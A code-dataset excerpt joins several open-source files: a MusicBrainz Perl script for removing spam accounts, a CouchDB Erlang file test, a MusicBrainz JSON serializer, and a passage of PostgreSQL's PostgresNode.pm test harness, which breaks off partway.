] | 1,227 | 2015-04-16T01:00:29.000Z | 2022-03-30T15:08:46.000Z | admin/RemoveSpamAccounts.pl | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 280 | 2015-01-04T08:39:41.000Z | 2022-03-10T17:09:59.000Z | #!/usr/bin/env perl
use warnings;
#____________________________________________________________________________
#
# MusicBrainz -- the open internet music database
#
# Copyright (C) 2011-2017 MetaBrainz Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# $Id$
#____________________________________________________________________________
use strict;
use FindBin;
use lib "$FindBin::Bin/../lib";
use open ':std', ':encoding(UTF-8)';
use Getopt::Long;
use Log::Dispatch;
use MusicBrainz::Server::Context;
my $verbose = 0;
my $case_insensitive = 0;
my $force = 0;
my $dry_run = 0;
my $pattern = undef;
my $column = undef;
GetOptions(
"column|c=s" => \$column,
"pattern|p=s" => \$pattern,
"dry-run|d" => \$dry_run,
"force|f" => \$force,
"ignore-case|i" => \$case_insensitive,
"verbose|v" => \$verbose,
) or usage();
my %allowed_columns = (
'name' => 1,
'email' => 1,
'website' => 1,
'bio' => 1,
);
sub usage {
warn <<EOF;
Usage: $0 <filter> [options]
FILTERS
-c --column COLUMN Specify the column used to filter accounts
-p --pattern PATTERN Specify the pattern matching column values
Allowed columns
name
email
website
bio
Patterns are case sensitive POSIX regular expressions, see
https://www.postgresql.org/docs/current/static/functions-matching.html#FUNCTIONS-POSIX-REGEXP
OPTIONS
-d, --dry-run Perform a trial run without removing any account
-f, --force Remove accounts even if they have edits/votes/OAuth tokens
-i, --ignore-case Consider patterns as case insensitive POSIX regular expressions
-v, --verbose Print filtered column additionally to id and name
EXAMPLES
$0 --column name --dry-run --pattern '^yvanzo\$'
Perform a trial run of removing account of script author
$0 --column email --dry-run --pattern '\@metabrainz.org\$'
Perform a trial run of removing accounts of MetaBrainz team
$0 --column website --dry-run --pattern '\\<gracenote\\.com\\>'
Perform a trial run of removing every account linked to Gracenote
$0 --column bio --dry-run --pattern 'unicorn' --ignore-case
Perform a trial run of removing every account which dared to mention unicorn in its bio
EOF
exit(2);
};
if (!defined $column || $column eq '') {
warn "No filtered column given, you dolt. Refusing to do anything.\n";
usage();
}
if (!exists($allowed_columns{$column})) {
warn "Given filtered column is not allowed, you dolt. Refusing to do anything.\n";
usage();
}
if (!defined $pattern || $pattern eq '') {
warn "No matching pattern given, you dolt. Refusing to do anything.\n";
usage();
}
my $c = MusicBrainz::Server::Context->create_script_context();
my $sql = Sql->new($c->conn);
my $dbh = $c->dbh;
my $regexp_operator = $case_insensitive ? '~*' : '~';
my $editors = $c->sql->select_list_of_hashes("SELECT id, name, $column FROM editor WHERE $column $regexp_operator ?", $pattern);
foreach my $ed (@{$editors}) {
my $details = $dbh->quote($ed->{name});
if ($verbose && $column ne 'name') {
$details .= " [${column}=" . $dbh->quote($ed->{$column}) . "]";
}
my $id = $ed->{id};
if (!$force) {
my $edit_count = $c->sql->select_single_value("SELECT count(*) FROM edit WHERE editor = ?", $id);
if ($edit_count > 0) {
print "Not removing account " . $details . " because it has edits.\n";
next;
}
my $vote_count = $c->sql->select_single_value("SELECT count(*) FROM vote WHERE editor = ?", $id);
if ($vote_count > 0) {
print "Not removing account " . $details . " because it has votes.\n";
next;
}
my $oauth_token_count = $c->sql->select_single_value("SELECT count(*) FROM editor_oauth_token WHERE editor = ?", $id);
if ($oauth_token_count > 0) {
print "Not removing account " . $details . " because it has OAuth tokens.\n";
next;
}
}
if ($dry_run) {
print "removing account " . $details . " (dry run)\n";
}
else
{
print "removing account " . $details . "\n";
eval {
$c->model('Editor')->delete($id);
$sql->begin;
$sql->do("DELETE FROM edit_note WHERE editor = ?", $id);
$sql->do("DELETE FROM editor WHERE id = ?", $id);
$sql->commit;
};
if ($@) {
warn "Remove editor $id died with $@\n";
}
}
}
| 31.185629 | 128 | 0.624424 |
ed71f5e8b34ea10976ba6447a4deac8e14a0a12d | 4,099 | t | Perl | apps/couch/test/etap/010-file-basics.t | lazedo/bigcouch | 8e9c1ec0ed1676ff152f10658f5c83a1a91fa8fe | [
"Apache-2.0"
] | 73 | 2015-03-19T04:04:52.000Z | 2021-08-16T10:45:11.000Z | test/etap/010-file-basics.t | timanglade/couchdb | b601286dae04bdc2488a0d9bf028c58e6feb3449 | [
"Apache-2.0"
] | 5 | 2016-04-26T13:19:25.000Z | 2017-03-11T14:11:22.000Z | test/etap/010-file-basics.t | timanglade/couchdb | b601286dae04bdc2488a0d9bf028c58e6feb3449 | [
"Apache-2.0"
] | 13 | 2015-03-27T05:21:42.000Z | 2017-05-22T11:45:30.000Z | #!/usr/bin/env escript
%% -*- erlang -*-
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
% WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
% License for the specific language governing permissions and limitations under
% the License.
filename() -> test_util:build_file("test/etap/temp.010").
main(_) ->
test_util:init_code_path(),
etap:plan(19),
case (catch test()) of
ok ->
etap:end_tests();
Other ->
etap:diag(io_lib:format("Test died abnormally: ~p", [Other])),
etap:bail()
end,
ok.
test() ->
etap:is({error, enoent}, couch_file:open("not a real file"),
"Opening a non-existant file should return an enoent error."),
etap:fun_is(
fun({ok, _}) -> true; (_) -> false end,
couch_file:open(filename() ++ ".1", [create, invalid_option]),
"Invalid flags to open are ignored."
),
{ok, Fd} = couch_file:open(filename() ++ ".0", [create, overwrite]),
etap:ok(is_pid(Fd),
"Returned file descriptor is a Pid"),
etap:is({ok, 0}, couch_file:bytes(Fd),
"Newly created files have 0 bytes."),
etap:is({ok, 0}, couch_file:append_term(Fd, foo),
"Appending a term returns the previous end of file position."),
{ok, Size} = couch_file:bytes(Fd),
etap:is_greater(Size, 0,
"Writing a term increased the file size."),
etap:is({ok, Size}, couch_file:append_binary(Fd, <<"fancy!">>),
"Appending a binary returns the current file size."),
etap:is({ok, foo}, couch_file:pread_term(Fd, 0),
"Reading the first term returns what we wrote: foo"),
etap:is({ok, <<"fancy!">>}, couch_file:pread_binary(Fd, Size),
"Reading back the binary returns what we wrote: <<\"fancy\">>."),
etap:is({ok, <<131, 100, 0, 3, 102, 111, 111>>},
couch_file:pread_binary(Fd, 0),
"Reading a binary at a term position returns the term as binary."
),
{ok, BinPos} = couch_file:append_binary(Fd, <<131,100,0,3,102,111,111>>),
etap:is({ok, foo}, couch_file:pread_term(Fd, BinPos),
"Reading a term from a written binary term representation succeeds."),
BigBin = list_to_binary(lists:duplicate(100000, 0)),
{ok, BigBinPos} = couch_file:append_binary(Fd, BigBin),
etap:is({ok, BigBin}, couch_file:pread_binary(Fd, BigBinPos),
"Reading a large term from a written representation succeeds."),
ok = couch_file:write_header(Fd, hello),
etap:is({ok, hello}, couch_file:read_header(Fd),
"Reading a header succeeds."),
{ok, BigBinPos2} = couch_file:append_binary(Fd, BigBin),
etap:is({ok, BigBin}, couch_file:pread_binary(Fd, BigBinPos2),
"Reading a large term from a written representation succeeds 2."),
% append_binary == append_iolist?
% Possible bug in pread_iolist or iolist() -> append_binary
{ok, IOLPos} = couch_file:append_binary(Fd, ["foo", $m, <<"bam">>]),
{ok, IoList} = couch_file:pread_iolist(Fd, IOLPos),
etap:is(<<"foombam">>, iolist_to_binary(IoList),
"Reading an results in a binary form of the written iolist()"),
% XXX: How does on test fsync?
etap:is(ok, couch_file:sync(Fd),
"Syncing does not cause an error."),
etap:is(ok, couch_file:truncate(Fd, Size),
"Truncating a file succeeds."),
%etap:is(eof, (catch couch_file:pread_binary(Fd, Size)),
% "Reading data that was truncated fails.")
etap:skip(fun() -> ok end,
"No idea how to test reading beyond EOF"),
etap:is({ok, foo}, couch_file:pread_term(Fd, 0),
"Truncating does not affect data located before the truncation mark."),
etap:is(ok, couch_file:close(Fd),
"Files close properly."),
ok.
| 37.605505 | 79 | 0.63796 |
eda86e620cd55b6d12fb8f2e121a9479a502f64b | 1,278 | pm | Perl | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 2 | 2019-03-14T05:31:35.000Z | 2019-03-14T05:32:01.000Z | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 2 | 2021-05-12T00:15:55.000Z | 2022-02-14T04:56:24.000Z | lib/MusicBrainz/Server/WebService/Serializer/JSON/2/Instrument.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 1 | 2020-01-18T14:59:32.000Z | 2020-01-18T14:59:32.000Z | package MusicBrainz::Server::WebService::Serializer::JSON::2::Instrument;
use Moose;
use MusicBrainz::Server::WebService::Serializer::JSON::2::Utils qw( list_of number serialize_entity );
extends 'MusicBrainz::Server::WebService::Serializer::JSON::2';
sub serialize {
my ($self, $entity, $inc, $stash, $toplevel) = @_;
my %body;
$body{name} = $entity->name;
$body{disambiguation} = $entity->comment // "";
$body{description} = $entity->description // "";
return \%body;
};
__PACKAGE__->meta->make_immutable;
no Moose;
1;
=head1 COPYRIGHT
Copyright (C) 2014 MetaBrainz Foundation
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
=cut
| 30.428571 | 102 | 0.742567 |
ed5b4a1c4b53a656ad9932764051c5147d94b7cf | 64,901 | pm | Perl | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 247 | 2017-10-20T08:41:10.000Z | 2022-02-04T01:08:03.000Z | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 1,295 | 2015-01-08T14:55:22.000Z | 2022-03-28T00:41:45.000Z | src/test/perl/PostgresNode.pm | onelazyteam/postgres | ba135fa537ab5c2fca0d589c826ebb3ecf98b2f1 | [
"PostgreSQL"
] | 103 | 2015-01-07T14:16:37.000Z | 2022-03-06T07:57:21.000Z |
# Copyright (c) 2021, PostgreSQL Global Development Group
=pod
=head1 NAME
PostgresNode - class representing PostgreSQL server instance
=head1 SYNOPSIS
use PostgresNode;
my $node = PostgresNode->get_new_node('mynode');
# Create a data directory with initdb
$node->init();
# Start the PostgreSQL server
$node->start();
# Change a setting and restart
$node->append_conf('postgresql.conf', 'hot_standby = on');
$node->restart();
# run a query with psql, like:
# echo 'SELECT 1' | psql -qAXt postgres -v ON_ERROR_STOP=1
$psql_stdout = $node->safe_psql('postgres', 'SELECT 1');
# Run psql with a timeout, capturing stdout and stderr
# as well as the psql exit code. Pass some extra psql
# options. If there's an error from psql raise an exception.
my ($stdout, $stderr, $timed_out);
my $cmdret = $node->psql('postgres', 'SELECT pg_sleep(600)',
stdout => \$stdout, stderr => \$stderr,
timeout => 180, timed_out => \$timed_out,
extra_params => ['--single-transaction'],
on_error_die => 1)
print "Sleep timed out" if $timed_out;
# Similar thing, more convenient in common cases
my ($cmdret, $stdout, $stderr) =
$node->psql('postgres', 'SELECT 1');
# run query every second until it returns 't'
# or times out
$node->poll_query_until('postgres', q|SELECT random() < 0.1;|')
or die "timed out";
# Do an online pg_basebackup
my $ret = $node->backup('testbackup1');
# Take a backup of a running server
my $ret = $node->backup_fs_hot('testbackup2');
# Take a backup of a stopped server
$node->stop;
my $ret = $node->backup_fs_cold('testbackup3')
# Restore it to create a new independent node (not a replica)
my $replica = get_new_node('replica');
$replica->init_from_backup($node, 'testbackup');
$replica->start;
# Stop the server
$node->stop('fast');
# Find a free, unprivileged TCP port to bind some other service to
my $port = get_free_port();
=head1 DESCRIPTION
PostgresNode contains a set of routines able to work on a PostgreSQL node,
allowing to start, stop, backup and initialize it with various options.
The set of nodes managed by a given test is also managed by this module.
In addition to node management, PostgresNode instances have some wrappers
around Test::More functions to run commands with an environment set up to
point to the instance.
The IPC::Run module is required.
=cut
package PostgresNode;
use strict;
use warnings;
use Carp;
use Config;
use Cwd;
use Exporter 'import';
use Fcntl qw(:mode);
use File::Basename;
use File::Path qw(rmtree);
use File::Spec;
use File::stat qw(stat);
use File::Temp ();
use IPC::Run;
use PostgresVersion;
use RecursiveCopy;
use Socket;
use Test::More;
use TestLib ();
use Time::HiRes qw(usleep);
use Scalar::Util qw(blessed);
our @EXPORT = qw(
get_new_node
get_free_port
);
our ($use_tcp, $test_localhost, $test_pghost, $last_host_assigned,
$last_port_assigned, @all_nodes, $died);
INIT
{
# Set PGHOST for backward compatibility. This doesn't work for own_host
# nodes, so prefer to not rely on this when writing new tests.
$use_tcp = !$TestLib::use_unix_sockets;
$test_localhost = "127.0.0.1";
$last_host_assigned = 1;
$test_pghost = $use_tcp ? $test_localhost : TestLib::tempdir_short;
$ENV{PGHOST} = $test_pghost;
$ENV{PGDATABASE} = 'postgres';
# Tracking of last port value assigned to accelerate free port lookup.
$last_port_assigned = int(rand() * 16384) + 49152;
}
=pod
=head1 METHODS
=over
=item PostgresNode::new($class, $name, $pghost, $pgport)
Create a new PostgresNode instance. Does not initdb or start it.
You should generally prefer to use get_new_node() instead since it takes care
of finding port numbers, registering instances for cleanup, etc.
=cut
sub new
{
my ($class, $name, $pghost, $pgport) = @_;
my $testname = basename($0);
$testname =~ s/\.[^.]+$//;
my $self = {
_port => $pgport,
_host => $pghost,
_basedir => "$TestLib::tmp_check/t_${testname}_${name}_data",
_name => $name,
_logfile_generation => 0,
_logfile_base => "$TestLib::log_path/${testname}_${name}",
_logfile => "$TestLib::log_path/${testname}_${name}.log"
};
bless $self, $class;
mkdir $self->{_basedir}
or
BAIL_OUT("could not create data directory \"$self->{_basedir}\": $!");
$self->dump_info;
return $self;
}
=pod
=item $node->port()
Get the port number assigned to the host. This won't necessarily be a TCP port
open on the local host since we prefer to use unix sockets if possible.
Use $node->connstr() if you want a connection string.
=cut
sub port
{
my ($self) = @_;
return $self->{_port};
}
=pod
=item $node->host()
Return the host (like PGHOST) for this instance. May be a UNIX socket path.
Use $node->connstr() if you want a connection string.
=cut
sub host
{
my ($self) = @_;
return $self->{_host};
}
=pod
=item $node->basedir()
The directory all the node's files will be within - datadir, archive directory,
backups, etc.
=cut
sub basedir
{
my ($self) = @_;
return $self->{_basedir};
}
=pod
=item $node->name()
The name assigned to the node at creation time.
=cut
sub name
{
my ($self) = @_;
return $self->{_name};
}
=pod
=item $node->logfile()
Path to the PostgreSQL log file for this instance.
=cut
sub logfile
{
my ($self) = @_;
return $self->{_logfile};
}
=pod
=item $node->connstr()
Get a libpq connection string that will establish a connection to
this node. Suitable for passing to psql, DBD::Pg, etc.
=cut
sub connstr
{
my ($self, $dbname) = @_;
my $pgport = $self->port;
my $pghost = $self->host;
if (!defined($dbname))
{
return "port=$pgport host=$pghost";
}
# Escape properly the database string before using it, only
# single quotes and backslashes need to be treated this way.
$dbname =~ s#\\#\\\\#g;
$dbname =~ s#\'#\\\'#g;
return "port=$pgport host=$pghost dbname='$dbname'";
}
=pod
=item $node->group_access()
Does the data dir allow group access?
=cut
sub group_access
{
my ($self) = @_;
my $dir_stat = stat($self->data_dir);
defined($dir_stat)
or die('unable to stat ' . $self->data_dir);
return (S_IMODE($dir_stat->mode) == 0750);
}
=pod
=item $node->data_dir()
Returns the path to the data directory. postgresql.conf and pg_hba.conf are
always here.
=cut
sub data_dir
{
my ($self) = @_;
my $res = $self->basedir;
return "$res/pgdata";
}
=pod
=item $node->archive_dir()
If archiving is enabled, WAL files go here.
=cut
sub archive_dir
{
my ($self) = @_;
my $basedir = $self->basedir;
return "$basedir/archives";
}
=pod
=item $node->backup_dir()
The output path for backups taken with $node->backup()
=cut
sub backup_dir
{
my ($self) = @_;
my $basedir = $self->basedir;
return "$basedir/backup";
}
=pod
=item $node->info()
Return a string containing human-readable diagnostic information (paths, etc)
about this node.
=cut
sub info
{
my ($self) = @_;
my $_info = '';
open my $fh, '>', \$_info or die;
print $fh "Name: " . $self->name . "\n";
print $fh "Version: " . $self->{_pg_version} . "\n"
if $self->{_pg_version};
print $fh "Data directory: " . $self->data_dir . "\n";
print $fh "Backup directory: " . $self->backup_dir . "\n";
print $fh "Archive directory: " . $self->archive_dir . "\n";
print $fh "Connection string: " . $self->connstr . "\n";
print $fh "Log file: " . $self->logfile . "\n";
print $fh "Install Path: ", $self->{_install_path} . "\n"
if $self->{_install_path};
close $fh or die;
return $_info;
}
=pod
=item $node->dump_info()
Print $node->info()
=cut
sub dump_info
{
my ($self) = @_;
print $self->info;
return;
}
# Internal method to set up trusted pg_hba.conf for replication. Not
# documented because you shouldn't use it, it's called automatically if needed.
sub set_replication_conf
{
my ($self) = @_;
my $pgdata = $self->data_dir;
$self->host eq $test_pghost
or croak "set_replication_conf only works with the default host";
open my $hba, '>>', "$pgdata/pg_hba.conf";
print $hba "\n# Allow replication (set up by PostgresNode.pm)\n";
if ($TestLib::windows_os && !$TestLib::use_unix_sockets)
{
print $hba
"host replication all $test_localhost/32 sspi include_realm=1 map=regress\n";
}
close $hba;
return;
}
=pod
=item $node->init(...)
Initialize a new cluster for testing.
Authentication is set up so that only the current OS user can access the
cluster. On Unix, we use Unix domain socket connections, with the socket in
a directory that's only accessible to the current user to ensure that.
On Windows, we use SSPI authentication to ensure the same (by pg_regress
--config-auth).
WAL archiving can be enabled on this node by passing the keyword parameter
has_archiving => 1. This is disabled by default.
postgresql.conf can be set up for replication by passing the keyword
parameter allows_streaming => 'logical' or 'physical' (passing 1 will also
suffice for physical replication) depending on type of replication that
should be enabled. This is disabled by default.
The new node is set up in a fast but unsafe configuration where fsync is
disabled.
=cut
sub init
{
my ($self, %params) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $host = $self->host;
local %ENV = $self->_get_env();
$params{allows_streaming} = 0 unless defined $params{allows_streaming};
$params{has_archiving} = 0 unless defined $params{has_archiving};
mkdir $self->backup_dir;
mkdir $self->archive_dir;
TestLib::system_or_bail('initdb', '-D', $pgdata, '-A', 'trust', '-N',
@{ $params{extra} });
TestLib::system_or_bail($ENV{PG_REGRESS}, '--config-auth', $pgdata,
@{ $params{auth_extra} });
open my $conf, '>>', "$pgdata/postgresql.conf";
print $conf "\n# Added by PostgresNode.pm\n";
print $conf "fsync = off\n";
print $conf "restart_after_crash = off\n";
print $conf "log_line_prefix = '%m [%p] %q%a '\n";
print $conf "log_statement = all\n";
print $conf "log_replication_commands = on\n";
print $conf "wal_retrieve_retry_interval = '500ms'\n";
# If a setting tends to affect whether tests pass or fail, print it after
# TEMP_CONFIG. Otherwise, print it before TEMP_CONFIG, thereby permitting
# overrides. Settings that merely improve performance or ease debugging
# belong before TEMP_CONFIG.
print $conf TestLib::slurp_file($ENV{TEMP_CONFIG})
if defined $ENV{TEMP_CONFIG};
# XXX Neutralize any stats_temp_directory in TEMP_CONFIG. Nodes running
# concurrently must not share a stats_temp_directory.
print $conf "stats_temp_directory = 'pg_stat_tmp'\n";
if ($params{allows_streaming})
{
if ($params{allows_streaming} eq "logical")
{
print $conf "wal_level = logical\n";
}
else
{
print $conf "wal_level = replica\n";
}
print $conf "max_wal_senders = 10\n";
print $conf "max_replication_slots = 10\n";
print $conf "wal_log_hints = on\n";
print $conf "hot_standby = on\n";
# conservative settings to ensure we can run multiple postmasters:
print $conf "shared_buffers = 1MB\n";
print $conf "max_connections = 10\n";
# limit disk space consumption, too:
print $conf "max_wal_size = 128MB\n";
}
else
{
print $conf "wal_level = minimal\n";
print $conf "max_wal_senders = 0\n";
}
print $conf "port = $port\n";
if ($use_tcp)
{
print $conf "unix_socket_directories = ''\n";
print $conf "listen_addresses = '$host'\n";
}
else
{
print $conf "unix_socket_directories = '$host'\n";
print $conf "listen_addresses = ''\n";
}
close $conf;
chmod($self->group_access ? 0640 : 0600, "$pgdata/postgresql.conf")
or die("unable to set permissions for $pgdata/postgresql.conf");
$self->set_replication_conf if $params{allows_streaming};
$self->enable_archiving if $params{has_archiving};
return;
}
=pod
=item $node->append_conf(filename, str)
A shortcut method to append to files like pg_hba.conf and postgresql.conf.
Does no validation or sanity checking. Does not reload the configuration
after writing.
A newline is automatically appended to the string.
=cut
sub append_conf
{
my ($self, $filename, $str) = @_;
my $conffile = $self->data_dir . '/' . $filename;
TestLib::append_to_file($conffile, $str . "\n");
chmod($self->group_access() ? 0640 : 0600, $conffile)
or die("unable to set permissions for $conffile");
return;
}
=pod
=item $node->backup(backup_name)
Create a hot backup with B<pg_basebackup> in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including the WAL.
By default, WAL files are fetched at the end of the backup, not streamed.
You can adjust that and other things by passing an array of additional
B<pg_basebackup> command line options in the keyword parameter backup_options.
You'll have to configure a suitable B<max_wal_senders> on the
target server since it isn't done by default.
=cut
sub backup
{
my ($self, $backup_name, %params) = @_;
my $backup_path = $self->backup_dir . '/' . $backup_name;
my $name = $self->name;
local %ENV = $self->_get_env();
print "# Taking pg_basebackup $backup_name from node \"$name\"\n";
TestLib::system_or_bail(
'pg_basebackup', '-D',
$backup_path, '-h',
$self->host, '-p',
$self->port, '--checkpoint',
'fast', '--no-sync',
@{ $params{backup_options} });
print "# Backup finished\n";
return;
}
=item $node->backup_fs_hot(backup_name)
Create a backup with a filesystem level copy in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including WAL.
Archiving must be enabled, as B<pg_start_backup()> and B<pg_stop_backup()> are
used. This is not checked or enforced.
The backup name is passed as the backup label to B<pg_start_backup()>.
=cut
sub backup_fs_hot
{
my ($self, $backup_name) = @_;
$self->_backup_fs($backup_name, 1);
return;
}
=item $node->backup_fs_cold(backup_name)
Create a backup with a filesystem level copy in subdirectory B<backup_name> of
B<< $node->backup_dir >>, including WAL. The server must be
stopped as no attempt to handle concurrent writes is made.
Use B<backup> or B<backup_fs_hot> if you want to back up a running server.
=cut
sub backup_fs_cold
{
my ($self, $backup_name) = @_;
$self->_backup_fs($backup_name, 0);
return;
}
# Common sub of backup_fs_hot and backup_fs_cold
sub _backup_fs
{
my ($self, $backup_name, $hot) = @_;
my $backup_path = $self->backup_dir . '/' . $backup_name;
my $port = $self->port;
my $name = $self->name;
print "# Taking filesystem backup $backup_name from node \"$name\"\n";
if ($hot)
{
my $stdout = $self->safe_psql('postgres',
"SELECT * FROM pg_start_backup('$backup_name');");
print "# pg_start_backup: $stdout\n";
}
RecursiveCopy::copypath(
$self->data_dir,
$backup_path,
filterfn => sub {
my $src = shift;
return ($src ne 'log' and $src ne 'postmaster.pid');
});
if ($hot)
{
# We ignore pg_stop_backup's return value. We also assume archiving
# is enabled; otherwise the caller will have to copy the remaining
# segments.
my $stdout =
$self->safe_psql('postgres', 'SELECT * FROM pg_stop_backup();');
print "# pg_stop_backup: $stdout\n";
}
print "# Backup finished\n";
return;
}
=pod
=item $node->init_from_backup(root_node, backup_name)
Initialize a node from a backup, which may come from this node or a different
node. root_node must be a PostgresNode reference, backup_name the string name
of a backup previously created on that node with $node->backup.
Does not start the node after initializing it.
By default, the backup is assumed to be plain format. To restore from
a tar-format backup, pass the name of the tar program to use in the
keyword parameter tar_program. Note that tablespace tar files aren't
handled here.
Streaming replication can be enabled on this node by passing the keyword
parameter has_streaming => 1. This is disabled by default.
Restoring WAL segments from archives using restore_command can be enabled
by passing the keyword parameter has_restoring => 1. This is disabled by
default.
If has_restoring is used, standby mode is used by default. To use
recovery mode instead, pass the keyword parameter standby => 0.
The backup is copied, leaving the original unmodified. pg_hba.conf is
unconditionally set to enable replication connections.
=cut
sub init_from_backup
{
my ($self, $root_node, $backup_name, %params) = @_;
my $backup_path = $root_node->backup_dir . '/' . $backup_name;
my $host = $self->host;
my $port = $self->port;
my $node_name = $self->name;
my $root_name = $root_node->name;
$params{has_streaming} = 0 unless defined $params{has_streaming};
$params{has_restoring} = 0 unless defined $params{has_restoring};
$params{standby} = 1 unless defined $params{standby};
print
"# Initializing node \"$node_name\" from backup \"$backup_name\" of node \"$root_name\"\n";
croak "Backup \"$backup_name\" does not exist at $backup_path"
unless -d $backup_path;
mkdir $self->backup_dir;
mkdir $self->archive_dir;
my $data_path = $self->data_dir;
if (defined $params{tar_program})
{
mkdir($data_path);
TestLib::system_or_bail($params{tar_program}, 'xf',
$backup_path . '/base.tar',
'-C', $data_path);
TestLib::system_or_bail(
$params{tar_program}, 'xf',
$backup_path . '/pg_wal.tar', '-C',
$data_path . '/pg_wal');
}
else
{
rmdir($data_path);
RecursiveCopy::copypath($backup_path, $data_path);
}
chmod(0700, $data_path);
# Base configuration for this node
$self->append_conf(
'postgresql.conf',
qq(
port = $port
));
if ($use_tcp)
{
$self->append_conf('postgresql.conf', "listen_addresses = '$host'");
}
else
{
$self->append_conf('postgresql.conf',
"unix_socket_directories = '$host'");
}
$self->enable_streaming($root_node) if $params{has_streaming};
$self->enable_restoring($root_node, $params{standby})
if $params{has_restoring};
return;
}
=pod
=item $node->rotate_logfile()
Switch to a new PostgreSQL log file. This does not alter any running
PostgreSQL process. Subsequent method calls, including pg_ctl invocations,
will use the new name. Return the new name.
=cut
sub rotate_logfile
{
my ($self) = @_;
$self->{_logfile} = sprintf('%s_%d.log',
$self->{_logfile_base},
++$self->{_logfile_generation});
return $self->{_logfile};
}
=pod
=item $node->start(%params) => success_or_failure
Wrapper for pg_ctl start
Start the node and wait until it is ready to accept connections.
=over
=item fail_ok => 1
By default, failure terminates the entire F<prove> invocation. If given,
instead return a true or false value to indicate success or failure.
=back
=cut
sub start
{
my ($self, %params) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
my $ret;
BAIL_OUT("node \"$name\" is already running") if defined $self->{_pid};
print("### Starting node \"$name\"\n");
# Temporarily unset PGAPPNAME so that the server doesn't
# inherit it. Otherwise this could affect libpqwalreceiver
# connections in confusing ways.
local %ENV = $self->_get_env(PGAPPNAME => undef);
# Note: We set the cluster_name here, not in postgresql.conf (in
# sub init) so that it does not get copied to standbys.
$ret = TestLib::system_log('pg_ctl', '-D', $self->data_dir, '-l',
$self->logfile, '-o', "--cluster-name=$name", 'start');
if ($ret != 0)
{
print "# pg_ctl start failed; logfile:\n";
print TestLib::slurp_file($self->logfile);
BAIL_OUT("pg_ctl start failed") unless $params{fail_ok};
return 0;
}
$self->_update_pid(1);
return 1;
}
=pod
=item $node->kill9()
Send SIGKILL (signal 9) to the postmaster.
Note: if the node is already known stopped, this does nothing.
However, if we think it's running and it's not, it's important for
this to fail. Otherwise, tests might fail to detect server crashes.
=cut
sub kill9
{
my ($self) = @_;
my $name = $self->name;
return unless defined $self->{_pid};
local %ENV = $self->_get_env();
print "### Killing node \"$name\" using signal 9\n";
# kill(9, ...) fails under msys Perl 5.8.8, so fall back on pg_ctl.
kill(9, $self->{_pid})
or TestLib::system_or_bail('pg_ctl', 'kill', 'KILL', $self->{_pid});
$self->{_pid} = undef;
return;
}
=pod
=item $node->stop(mode)
Stop the node using pg_ctl -m $mode and wait for it to stop.
Note: if the node is already known stopped, this does nothing.
However, if we think it's running and it's not, it's important for
this to fail. Otherwise, tests might fail to detect server crashes.
=cut
sub stop
{
my ($self, $mode) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
local %ENV = $self->_get_env();
$mode = 'fast' unless defined $mode;
return unless defined $self->{_pid};
print "### Stopping node \"$name\" using mode $mode\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-m', $mode, 'stop');
$self->_update_pid(0);
return;
}
=pod
=item $node->reload()
Reload configuration parameters on the node.
=cut
sub reload
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Reloading node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, 'reload');
return;
}
=pod
=item $node->restart()
Wrapper for pg_ctl restart
=cut
sub restart
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env(PGAPPNAME => undef);
print "### Restarting node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'restart');
$self->_update_pid(1);
return;
}
=pod
=item $node->promote()
Wrapper for pg_ctl promote
=cut
sub promote
{
my ($self) = @_;
my $port = $self->port;
my $pgdata = $self->data_dir;
my $logfile = $self->logfile;
my $name = $self->name;
local %ENV = $self->_get_env();
print "### Promoting node \"$name\"\n";
TestLib::system_or_bail('pg_ctl', '-D', $pgdata, '-l', $logfile,
'promote');
return;
}
=pod
=item $node->logrotate()
Wrapper for pg_ctl logrotate
=cut
sub logrotate
{
